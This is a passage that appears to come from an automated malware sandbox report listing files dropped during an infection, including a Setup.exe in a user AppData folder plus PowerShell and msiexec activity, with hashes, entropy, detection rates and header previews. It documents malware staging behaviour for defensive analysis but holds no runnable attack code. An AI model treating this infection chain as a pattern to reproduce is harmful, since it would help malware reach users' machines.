                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):26604
                                                                                                                                                          Entropy (8bit):5.053909410690657
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:SLbV3IpNBQkj2Uh4iUxkOZhxsardFfJ+OdBOtAHkvNZzNKe1MlYoaYP:SLbV3CNBQkj2Uh4iUxkOeqdJJ+OdBOtW
                                                                                                                                                          MD5:7D2AEE50616E1DA59B1C6D051B499807
                                                                                                                                                          SHA1:9FEF7842532F7EF1990C6A0AE9F07988238A326E
                                                                                                                                                          SHA-256:43E0A755EF686E8493E49832F595D75241DA0573791F7DAFC0C1672F1A267DEA
                                                                                                                                                          SHA-512:BAC9620D053B35485F1FE104710943F716DF769E532159A667E235F59DBF954B217BD0F13DE2C5857DE842D994BD1F10911F9690C78B54DA01B22716FDF343A8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:PSMODULECACHE.(...m.\3.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem.........)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScr
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):64
                                                                                                                                                          Entropy (8bit):0.7307872139132228
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Nlllul4/X:NllU4/
                                                                                                                                                          MD5:3C34689C4BD27F7A51A67BBD54FA65C2
                                                                                                                                                          SHA1:E444E6B6E24D2FE2ACE5A5A7D96A6142C2368735
                                                                                                                                                          SHA-256:4B7DAB4629E6B8CC1CD6E404CB5FC110296C3D0F4E3FDBBDB0C1CE48B5B8A546
                                                                                                                                                          SHA-512:02827A36A507539C617DFE05EDF5367EB295EB80172794D83F3E9AF612125B7CA88218C2601DFA8E0E98888061A0C7B0E78428188523FA915F39B23F148F8766
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:@...e.................................,.........................
                                                                                                                                                          Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (8771), with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8771
                                                                                                                                                          Entropy (8bit):6.163137107759708
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:PN2x2BRm1fzHSJfB8ukob5xZs0P68q8SW/Yuj+y1uN:Ax/1fwVkEnZBSjuDuN
                                                                                                                                                          MD5:5D04B96A8949E10A0DB05D25A4A8A7BC
                                                                                                                                                          SHA1:1102A91A46F54A8C966B2A25F2EB8629665FF65D
                                                                                                                                                          SHA-256:FCFD08382B1513C7521CEF3FFC51A29946D78B95E9A48F294A1EE2A26B721513
                                                                                                                                                          SHA-512:5226FEB03D57D13411446F2845E9839F791D92DF8D6FE6FEB60FC4A7B8AE5FE9137389D0B3A695651D02AF2661F367060AE6866374258B62C3B4C65C9230A404
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewport" content="width=device-width,initial-scale=1"><style>*{box-sizing:border-box;margin:0;padding:0}html{line-height:1.15;-webkit-text-size-adjust:100%;color:#313131;font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;height:100vh;min-height:100vh}.main-content{margin:8rem auto;max-width:60rem;padding-left:1.5rem}@media (width <= 720px){.main-content{margin-top:4rem}}.h2{font-size:1.5rem;font-weight:500;line-height:2.25rem}@media (width <= 720px){.h2{font-size:1.25rem;line-height:1.5rem}}#challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0i
                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1049549
                                                                                                                                                          Entropy (8bit):7.556880588296405
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:zSszeJzbiUDrxN0a4Qp6JVfYcQtCBGQ0ZL:zS2euUDKVfYH06ZL
                                                                                                                                                          MD5:55019EA70B43BEDE1E4CD5BD07359715
                                                                                                                                                          SHA1:513FD7ABDA66FD14853935720AC38E22E343BA75
                                                                                                                                                          SHA-256:B69FC703AC69B1ED4F5DDBE97DE813C26B53662E276D886788315CF6EC1447AA
                                                                                                                                                          SHA-512:C6E08FF7F2627F0215E09E846B1542C88EF34445F8279510538F004CF8A5CFBC0FA1DF01A7D84ACE8A35E20A664F9DB69E5F5745EB305D3B542951DF11BFFFC7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1049549
                                                                                                                                                          Entropy (8bit):7.556875747302201
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:pSszeJzbiUDrxN0a4Qp6JVfYcQtCBGQ0ZL:pS2euUDKVfYH06ZL
                                                                                                                                                          MD5:82F291720EFA338F6559E5AB2FD24570
                                                                                                                                                          SHA1:F2BB575ADB8355C6C919B6CA26B3D427476C6A1E
                                                                                                                                                          SHA-256:FA214794DD620A7338859C4A4C22C67144C89FCD69A7685F18C308831166D119
                                                                                                                                                          SHA-512:810F6B613CD52565C18EDB393BF7F3066D8F6D1C5AEF2CC52A55146B7F90BF6F2796CA364545CC23A375A795B322788824C2AB2260949F74C5EB5C8CB8933C5C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Windows\SysWOW64\more.com
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):317952
                                                                                                                                                          Entropy (8bit):6.814759824094587
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:KfSVaPPWOWB0LcVL+oKMFgB7EmSS2CCiPhB5XSv1HNM853:9aPPWOWB0w1+oKogBYZvUzsBNM853
                                                                                                                                                          MD5:DE112F0273EFC66142E398EE8D51434C
                                                                                                                                                          SHA1:B0C8BB0D5D9A0A8D52BDA89C0DFCCB15EBF3E871
                                                                                                                                                          SHA-256:20488C1EC1CD4AA44E058FD02721486E51F30DCD9814BD778E3EE34BFCC06D79
                                                                                                                                                          SHA-512:ED81E9BF794BF87EDFA69E480188A980643F383FDB8140A3E149FBA482FD32C829A9FF98E063B864709348826382425772BFD0A71BE48912E8DF2FAD623AA9D6
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Z.Q..........................................@.......................................@..................................;...............................`...>...................................................=...............................text............................... ..`.rdata... ... ..."..................@..@.data...l....P...Z..................@....CRT.........P......................@..@.reloc...>...`...@..................@..Byicvgb..............................@...........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):6270976
                                                                                                                                                          Entropy (8bit):6.672220413310173
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:98304:UE5jJSnL0VxTOnyJJsv6tWKFdu9Cs/CzYnxqfDgw:UE5NSn0xrJJsv6tWKFdu9CMkexqfDF
                                                                                                                                                          MD5:65CA5D5EFCB36677F934B96F40FED552
                                                                                                                                                          SHA1:34A433C41B11D809E3B3B59C2F4030D1E3D94782
                                                                                                                                                          SHA-256:0AED0AE4B0631EB3EA9AD348B4E2F6276312192B8391A44209113668911596E0
                                                                                                                                                          SHA-512:F28707F05D23B866E7E71173E82A7F0C799F4C3CAADEF4F8B9B9D9EC78466F98F93755D987F4DE6C75551C7DCB47703CDC2CC718DE156FBD52107D78C7888C49
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........*.7.Kfd.Kfd.Kfd.3.d.Kfd.#ge.Kfdx.d.Kfd.#ce.Kfd.#be.Kfd.#ee.Kfd.#be.Kfd.#`e.Kfd.#ge.Kfd.Kgd.Jfdx"be.Kfdx"ce.Kfdx"fe.Kfdx".d.Kfd.K.d.Kfdx"de.KfdRich.Kfd........PE..d...}).a.........." .....r/...0.....P+.......................................``...........`...........................................P..N....X...... `.......Y..-...........0`.Z&....K.T...................p.K.(...p.K.............../.0............................text....p/......r/................. ..`.rdata...(.../...(..v/.............@..@.data........0X..V....X.............@....pdata...-....Y......fX.............@..@.qtmimed.....0[.......Z.............@..P.rsrc........ `......._.............@..@.reloc..\&...0`..(...._.............@..B........................................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1389568
                                                                                                                                                          Entropy (8bit):6.4031070456368
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:HO51NG2bq1mhQpCR4SSUVxiKZiva+su3pUlSuMEFR+PoT0lqU:34hQoRpSUVYKZqvsu3pUlNMEePoT0E
                                                                                                                                                          MD5:C24C89879410889DF656E3A961C59BCC
                                                                                                                                                          SHA1:25A9E4E545E86B0A5FE14EE0147746667892FABD
                                                                                                                                                          SHA-256:739BEDCFC8EB860927EB2057474BE5B39518AAAA6703F9F85307A432FA1F236E
                                                                                                                                                          SHA-512:0542C431049E4FD40619579062D206396BEF2F6DADADBF9294619C918B9E6C96634DCD404B78C6045974295126EC35DD842C6EC8F42279D9598B57A751CD0034
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Z..q.n.".n.".n."...".n."E.{#.n."L.{#.n."L.|#.n."L.z#.n."L.~#.n."E.~#.n."..~#.n.".n~".j."..z#.n."...#.n."...".n.".n.".n."..}#.n."Rich.n."........................PE..d....).a.........." .....p...........h....................................................`..............................................n...L..@....p.......p..x.......................T...................@...(...@...................H ...........................text....n.......p.................. ..`.rdata..X............t..............@..@.data...8Q.......$..................@....pdata..x....p.......&..............@..@.rsrc........p......................@..@.reloc............... ..............@..B................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):23966
                                                                                                                                                          Entropy (8bit):5.51352959157031
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:vp7uhvldPVDiktgppK0deSS88H69o67ZkZxDJoeHDsqfKtXZqhSbpKafCQN3dMsd:x69ldN+ugppK0d1S7HB6lSxDSe0tXZq+
                                                                                                                                                          MD5:D3DBC9E34960169C38554935FEE7E2A5
                                                                                                                                                          SHA1:B0EE82E4293ED4237A0D9ECD90EB91B99694F6B6
                                                                                                                                                          SHA-256:86C72C5EE6DE1DFCC3ED7E52A39DD2692B00C4EBF966B30A94F12C18BEDE0377
                                                                                                                                                          SHA-512:7509D56A0A4F33CE39724C38AB926C113C01D6BCF314F3F4E62513AC43AC1274A34B62AB6063B0F0C0DB8AFD2D1BA6578F6F873BAC4A9E9D0644A890B0EC49EC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2849280
                                                                                                                                                          Entropy (8bit):5.898395689897465
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:49152:KlOh5PuX2I9Rkf5gnQ7duzGuqFCtLQ2IqNPz38JQ41CPwDv3uFfJ:Q2Irkn2Iqt38C41CPwDv3uFfJ
                                                                                                                                                          MD5:28DEA3E780552EB5C53B3B9B1F556628
                                                                                                                                                          SHA1:55DCCD5B30CE0363E8EBDFEB1CCA38D1289748B8
                                                                                                                                                          SHA-256:52415829D85C06DF8724A3D3D00C98F12BEABF5D6F3CBAD919EC8000841A86E8
                                                                                                                                                          SHA-512:19DFE5F71901E43EA34D257F693AE1A36433DBDBCD7C9440D9B0F9EEA24DE65C4A8FE332F7B88144E1A719A6BA791C2048B4DD3E5B1ED0FDD4C813603AD35112
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                          • Filename: 4OVYJHCTFA.exe, Detection: malicious, Browse
                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):685056
                                                                                                                                                          Entropy (8bit):5.49393422013168
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:PcPPRr7K55yAAKDNkk1+cFc+CmRkS9/+wDe1rlXiE4D9u3AG3UQjA5WU2lvz:2N43+cFcmYhXixo7708U2lvz
                                                                                                                                                          MD5:4AD03043A32E9A1EF64115FC1ACE5787
                                                                                                                                                          SHA1:352E0E3A628C8626CFF7EED348221E889F6A25C4
                                                                                                                                                          SHA-256:A0E43CBC4A2D8D39F225ABD91980001B7B2B5001E8B2B8292537AE39B17B85D1
                                                                                                                                                          SHA-512:EDFAE3660A5F19A9DEDA0375EFBA7261D211A74F1D8B6BF1A8440FED4619C4B747ACA8301D221FD91230E7AF1DAB73123707CC6EDA90E53EB8B6B80872689BA6
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):578384
                                                                                                                                                          Entropy (8bit):6.524580849411757
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:RBSNvy11qsslnxU/1ceqHiNHlOp/2M+UHHZpDLO+r2VhQEKZm+jWodEEVAdm:RBSDOFQEKZm+jWodEE2dm
                                                                                                                                                          MD5:1BA6D1CF0508775096F9E121A24E5863
                                                                                                                                                          SHA1:DF552810D779476610DA3C8B956CC921ED6C91AE
                                                                                                                                                          SHA-256:74892D9B4028C05DEBAF0B9B5D9DC6D22F7956FA7D7EEE00C681318C26792823
                                                                                                                                                          SHA-512:9887D9F5838AA1555EA87968E014EDFE2F7747F138F1B551D1F609BC1D5D8214A5FDAB0D76FCAC98864C1DA5EB81405CA373B2A30CB12203C011D89EA6D069AF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):35704
                                                                                                                                                          Entropy (8bit):6.591016227549893
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:z1vZLMtUYqOoKFYpWcm5gW/ki0pSt+eB+Hj+R9zUkUTRtHRN7SoHR9zui5TJ:zpCtzqOjKYWi0QKHji9zSRtnx9zJTJ
                                                                                                                                                          MD5:69D96E09A54FBC5CF92A0E084AB33856
                                                                                                                                                          SHA1:B4629D51B5C4D8D78CCB3370B40A850F735B8949
                                                                                                                                                          SHA-256:A3A1199DE32BBBC8318EC33E2E1CE556247D012851E4B367FE853A51E74CE4EE
                                                                                                                                                          SHA-512:2087827137C473CDBEC87789361ED34FAD88C9FE80EF86B54E72AEA891D91AF50B17B7A603F9AE2060B3089CE9966FAD6D7FBE22DEE980C07ED491A75503F2CF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):806258
                                                                                                                                                          Entropy (8bit):7.867340280444731
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:fAgXTn9UMGNIdYP3lxAvcQrqUr85Bk9/VGzxhQ:ffLFyxdBKgznQ
                                                                                                                                                          MD5:38BE7366796E12E9DDAD7B3F244B401B
                                                                                                                                                          SHA1:59C6000B886D831E88BFA80DAC222B03FBF3F193
                                                                                                                                                          SHA-256:CBAD28D0A414B7C247CBF2891BF5FC3CA7939DDC74A4AE0E4C623AD3604C8A8D
                                                                                                                                                          SHA-512:810056EB3FC5F2021561A0B79543E893595E89444B8EC62F9AA1C67393548733645E7DA93F102D2CF203ABC1622CEA9C879DB5D06CFF71A497C3339001B99F9E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):298384
                                                                                                                                                          Entropy (8bit):6.4905956879024
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:504VEQ2u/niy9UVLCe9ZqdrP+VXvv+sJYB2RHKBi65lhTbCc+hnvvEyP7yq+uei1:QZu/i874ZcrMv2cRh7yqO2CPLHxYq8/B
                                                                                                                                                          MD5:6B4AB6E60364C55F18A56A39021B74A6
                                                                                                                                                          SHA1:39CAC2889D8CA497EE0D8434FC9F6966F18FA336
                                                                                                                                                          SHA-256:1DB3FD414039D3E5815A5721925DD2E0A3A9F2549603C6CAB7C49B84966A1AF3
                                                                                                                                                          SHA-512:C08DE8C6E331D13DFE868AB340E41552FC49123A9F782A5A63B95795D5D979E68B5A6AB171153978679C0791DC3E3809C883471A05864041CE60B240CCDD4C21
                                                                                                                                                          Malicious:false
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):109440
                                                                                                                                                          Entropy (8bit):6.642252418996898
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:BcghDMWyjXZZIzpdbJhKm6Kuzu8fsecbq8uOFQr+zMtY+zA:BVHyQNdbJAKuzRsecbq8uOFvyU
                                                                                                                                                          MD5:49C96CECDA5C6C660A107D378FDFC3D4
                                                                                                                                                          SHA1:00149B7A66723E3F0310F139489FE172F818CA8E
                                                                                                                                                          SHA-256:69320F278D90EFAAEB67E2A1B55E5B0543883125834C812C8D9C39676E0494FC
                                                                                                                                                          SHA-512:E09E072F3095379B0C921D41D6E64F4F1CD78400594A2317CFB5E5DCA03DEDB5A8239ED89905C9E967D1ACB376B0585A35ADDF6648422C7DDB472CE38B1BA60D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):49560
                                                                                                                                                          Entropy (8bit):6.6649899041961875
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:a0Q4HUcGJZekJSam1BbuBSYcCZbiLzlSHji9z4GwZHji9znwT:afnDex5izbiLzlE+z4Gwl+zwT
                                                                                                                                                          MD5:CF0A1C4776FFE23ADA5E570FC36E39FE
                                                                                                                                                          SHA1:2050FADECC11550AD9BDE0B542BCF87E19D37F1A
                                                                                                                                                          SHA-256:6FD366A691ED68430BCD0A3DE3D8D19A0CB2102952BFC140BBEF4354ED082C47
                                                                                                                                                          SHA-512:D95CD98D22CA048D0FC5BCA551C9DB13D6FA705F6AF120BBBB621CF2B30284BFDC7320D0A819BB26DAB1E0A46253CC311A370BED4EF72ECB60C69791ED720168
                                                                                                                                                          Malicious:false
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):35274003
                                                                                                                                                          Entropy (8bit):7.9959854903115115
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:786432:JUsWOp0Bt8ipedewoc623Rqa3YbUVa2X2kJK2SjGAirtoyRy:QOqByiuew0gotUVVXm2JAi5Jy
                                                                                                                                                          MD5:867537F1E2F91E74C68EAF029F21479B
                                                                                                                                                          SHA1:26F7CBEFC55DA0459903B1FB964D5382C7FA988C
                                                                                                                                                          SHA-256:085E482A89918E76A91AA3E17DB7AC5046B346D2477791CBF846A5367906791B
                                                                                                                                                          SHA-512:AED6A522816EB97C8E92AEF85F419CED6FA67E69B2DD212BB62F1024E8261EE3E442BD6F7868C1B9A550BB604793733D469437B0653020E2DC23EF05A8A00EA6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):6222
                                                                                                                                                          Entropy (8bit):3.713960268020827
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:0FNmQRoCGWU23WUukvhkvklCywStl1VTl1XSogZo2RF1VTl+XSogZo2l1:iloCGP8CkvhkvCCtSD1VTCHLH1VTHHLj
                                                                                                                                                          MD5:A9F8CB1E8F89C82CB455006A2935D502
                                                                                                                                                          SHA1:9F52AC269BF06478C32C8BEE1A1CCF2B1099DBD2
                                                                                                                                                          SHA-256:802EBF7E24094786790C1D83D7F41456308ECD464709EF1D85BF87510A0811B6
                                                                                                                                                          SHA-512:B7CC5B59E473906D003A0B4DF0AF8D1B77AFC6D98391DE909174D81ED9F83AF04F2D2C418817F188FEBDC4D0DAD8EDE31FCFBF87B01126E61CEC1327EE3F4C31
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):6222
                                                                                                                                                          Entropy (8bit):3.713960268020827
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:0FNmQRoCGWU23WUukvhkvklCywStl1VTl1XSogZo2RF1VTl+XSogZo2l1:iloCGP8CkvhkvCCtSD1VTCHLH1VTHHLj
                                                                                                                                                          MD5:A9F8CB1E8F89C82CB455006A2935D502
                                                                                                                                                          SHA1:9F52AC269BF06478C32C8BEE1A1CCF2B1099DBD2
                                                                                                                                                          SHA-256:802EBF7E24094786790C1D83D7F41456308ECD464709EF1D85BF87510A0811B6
                                                                                                                                                          SHA-512:B7CC5B59E473906D003A0B4DF0AF8D1B77AFC6D98391DE909174D81ED9F83AF04F2D2C418817F188FEBDC4D0DAD8EDE31FCFBF87B01126E61CEC1327EE3F4C31
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):6270976
                                                                                                                                                          Entropy (8bit):6.672220413310173
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:98304:UE5jJSnL0VxTOnyJJsv6tWKFdu9Cs/CzYnxqfDgw:UE5NSn0xrJJsv6tWKFdu9CMkexqfDF
                                                                                                                                                          MD5:65CA5D5EFCB36677F934B96F40FED552
                                                                                                                                                          SHA1:34A433C41B11D809E3B3B59C2F4030D1E3D94782
                                                                                                                                                          SHA-256:0AED0AE4B0631EB3EA9AD348B4E2F6276312192B8391A44209113668911596E0
                                                                                                                                                          SHA-512:F28707F05D23B866E7E71173E82A7F0C799F4C3CAADEF4F8B9B9D9EC78466F98F93755D987F4DE6C75551C7DCB47703CDC2CC718DE156FBD52107D78C7888C49
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1389568
                                                                                                                                                          Entropy (8bit):6.4031070456368
                                                                                                                                                          Encrypted:false
